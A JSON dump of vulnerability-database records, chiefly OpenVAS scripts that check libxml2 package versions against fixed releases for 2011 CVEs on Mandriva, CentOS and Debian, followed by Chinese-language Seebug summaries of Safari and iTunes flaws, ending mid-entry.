rpm:\"libxml2-utils~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:56:19", "bulletinFamily": "scanner", "description": "Check for the Version of libxml2", "modified": "2018-01-02T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881090", "id": "OPENVAS:881090", "title": "CentOS Update for libxml2 CESA-2012:0016 centos4 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libxml2 CESA-2012:0016 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The libxml2 library is a development toolbox providing the implementation\n of various XML standards. One of those standards is the XML Path Language\n (XPath), which is a language for addressing parts of an XML document.\n\n A heap-based buffer overflow flaw was found in the way libxml2 decoded\n entity references with long names. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-3919)\n \n An off-by-one error, leading to a heap-based buffer overflow, was found in\n the way libxml2 parsed certain XML files. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-0216)\n \n A flaw was found in the way libxml2 parsed certain XPath expressions. If an\n attacker were able to supply a specially-crafted XML file to an application\n using libxml2, as well as an XPath expression for that application to run\n against the crafted file, it could cause the application to crash.\n (CVE-2011-2834)\n \n Note: Red Hat does not ship any applications that use libxml2 in a way that\n would allow the CVE-2011-2834 flaw to be exploited; however, third-party\n applications may allow XPath expressions to be passed which could trigger\n this flaw.\n \n An out-of-bounds memory read flaw was found in libxml2. A remote attacker\n could provide a specially-crafted XML file that, when opened in an\n application linked against libxml2, would cause the application to crash.\n (CVE-2011-3905)\n \n All users of libxml2 are advised to upgrade to these updated packages,\n which contain backported patches to correct these issues. The desktop must\n be restarted (log out, then log back in) for this update to take effect.\";\n\ntag_affected = \"libxml2 on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-January/018369.html\");\n script_id(881090);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:28 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0016\");\n script_name(\"CentOS Update for libxml2 CESA-2012:0016 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libxml2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=70712", "id": "OPENVAS:70712", "title": "Debian Security Advisory DSA 2394-1 (libxml2)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2394_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2394-1 (libxml2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Many security problems had been fixed in libxml2, a popular library to handle\nXML data files.\n\nCVE-2011-3919:\nJ\u00fcri Aedla discovered a heap-based buffer overflow that allows remote attackers\nto cause a denial of service or possibly have unspecified other impact via\nunknown vectors.\n\nCVE-2011-0216:\nAn Off-by-one error have been discoveried that allows remote attackers to\nexecute arbitrary code or cause a denial of service.\n\nCVE-2011-2821:\nA memory corruption (double free) bug has been identified in libxml2's XPath\nengine. Through it, it is possible to an attacker allows cause a denial of\nservice or possibly have unspecified other impact. This vulnerability does not\naffect the oldstable distribution (lenny).\n\nCVE-2011-2834:\nYang Dingning discovered a double free vulnerability related to XPath handling.\n\nCVE-2011-3905:\nAn out-of-bounds read vulnerability had been discovered, which allows remote\nattackers to cause a denial of service.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.32.dfsg-5+lenny5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2.7.8.dfsg-2+squeeze2.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nWe recommend that you upgrade your libxml2 packages.\";\ntag_summary = \"The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202394-1\";\n\nif(description)\n{\n script_id(70712);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2821\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:29:27 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2394-1 (libxml2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070712", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070712", "title": "Debian Security Advisory DSA 2394-1 (libxml2)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2394_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2394-1 (libxml2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70712\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2821\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:29:27 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2394-1 (libxml2)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202394-1\");\n script_tag(name:\"insight\", value:\"Many security problems had been fixed in libxml2, a popular library to handle\nXML data files.\n\nCVE-2011-3919:\nJ\u00fcri Aedla discovered a heap-based buffer overflow that allows remote attackers\nto cause a denial of service or possibly have unspecified other impact via\nunknown vectors.\n\nCVE-2011-0216:\nAn Off-by-one error have been discoveried that allows remote attackers to\nexecute arbitrary code or cause a denial of service.\n\nCVE-2011-2821:\nA memory corruption (double free) bug has been identified in libxml2's XPath\nengine. Through it, it is possible to an attacker allows cause a denial of\nservice or possibly have unspecified other impact. This vulnerability does not\naffect the oldstable distribution (lenny).\n\nCVE-2011-2834:\nYang Dingning discovered a double free vulnerability related to XPath handling.\n\nCVE-2011-3905:\nAn out-of-bounds read vulnerability had been discovered, which allows remote\nattackers to cause a denial of service.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.32.dfsg-5+lenny5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2.7.8.dfsg-2+squeeze2.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.7.8.dfsg-7.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your libxml2 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:07:10", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 48808\r\nCVE ID: CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-1288,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1797\r\n\r\nSafari\u662f\u82f9\u679c\u8ba1\u7b97\u673a\u7684\u6700\u65b0\u4f5c\u4e1a\u7cfb\u7edfMac OS X\u4e2d\u7684\u6d4f\u89c8\u5668\uff0c\u4f7f\u7528\u4e86KDE\u7684KHTML\u4f5c\u4e3a\u6d4f\u89c8\u5668\u7684\u8fd0\u7b97\u6838\u5fc3\u3002\r\n\r\n5.1\u548c5.0.6\u4e4b\u524d\u7248\u672c\u7684Safari\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u6d4f\u89c8\u6076\u610f\u7f51\u9875\uff0c\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff0c\u62d2\u7edd\u670d\u52a1\u6216\u5176\u4ed6\u3002\n\nApple Safari 5.x\r\nApple Safari 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20751", "id": "SSV:20751", "type": "seebug", "title": "Apple Safari 5.1\u548c5.0.6\u4e4b\u524d\u7248\u672c\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:58:52", "bulletinFamily": "exploit", "description": "CVE ID: CVE-2010-1823,CVE-2011-0164,CVE-2011-0200,CVE-2011-0204,CVE-2011-0215,CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0223,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-0259,CVE-2011-0981,CVE-2011-0983,CVE-2011-1109,CVE-2011-1114,CVE-2011-1115,CVE-2011-1117,CVE-2011-1121,CVE-2011-1188,CVE-2011-1203,CVE-2011-1204,CVE-2011-1288,CVE-2011-1293,CVE-2011-1296,CVE-2011-1440,CVE-2011-1449,CVE-2011-1451,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1774,CVE-2011-1797,CVE-2011-2338,CVE-2011-2339,CVE-2011-2341,CVE-2011-2351,CVE-2011-2352,CVE-2011-2354,CVE-2011-2356,CVE-2011-2359,CVE-2011-2788,CVE-2011-2790,CVE-2011-2792,CVE-2011-2797,CVE-2011-2799,CVE-2011-2809,CVE-2011-2811,CVE-2011-2813,CVE-2011-2814,CVE-2011-2815,CVE-2011-2816,CVE-2011-2817,CVE-2011-2818,CVE-2011-2820,CVE-2011-2823,CVE-2011-2827,CVE-2011-2831,CVE-2011-3219,CVE-2011-3232,CVE-2011-3233,CVE-2011-3234,CVE-2011-3235,CVE-2011-3236,CVE-2011-3237,CVE-2011-3238,CVE-2011-3239,CVE-2011-3241,CVE-2011-3244,CVE-2011-3252\r\n\r\niTunes\u662f\u4e00\u6b3e\u5a92\u4f53\u64ad\u653e\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c2001\u5e741\u670810\u65e5\u7531\u82f9\u679c\u7535\u8111\u5728\u65e7\u91d1\u5c71\u7684Macworld Expo\u63a8\u51fa\uff0c\u7528\u6765\u64ad\u653e\u4ee5\u53ca\u7ba1\u7406\u6570\u5b57\u97f3\u4e50\u548c\u4e0e\u89c6\u9891\u6587\u4ef6\uff0c\u662f\u7ba1\u7406\u82f9\u679ciPod\u7684\u6587\u4ef6\u7684\u4e3b\u8981\u5de5\u5177\u3002\r\n\r\nApple iTunes\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u7528\u6237\u5229\u7528\u6cc4\u9732\u654f\u611f\u4fe1\u606f\uff0c\u64cd\u4f5c\u67d0\u4e9b\u6570\u636e\u3001\u6267\u884c\u8de8\u7ad9\u811a\u672c\u548c\u6b3a\u9a97\u653b\u51fb\u3001\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n1\uff09\u5728\u5904\u7406\u5b57\u7b26\u4e32\u6807\u5fd7\u5316\u65f6\uff0cCoreFoundation\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u7834\u574f\u5185\u5b58\u3002\r\n\r\n2\uff09\u5904\u7406AAC\u6d41\u65f6CoreAudio\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3\uff09\u5904\u7406H.264\u7f16\u7801\u6587\u4ef6\u65f6CoreMedia\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n4\uff09\u4f7f\u7528AddressSanitizer\u65f6WebKit\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u5185\u5b58\u7834\u574f\uff1b\r\n\r\n5\uff09WebKit\u7ec4\u4ef6\u7684\u591a\u4e2a\u9519\u8bef\u53ef\u88ab\u5229\u7528\u7834\u574f\u5185\u5b58\u3002\n\nApple iTunes 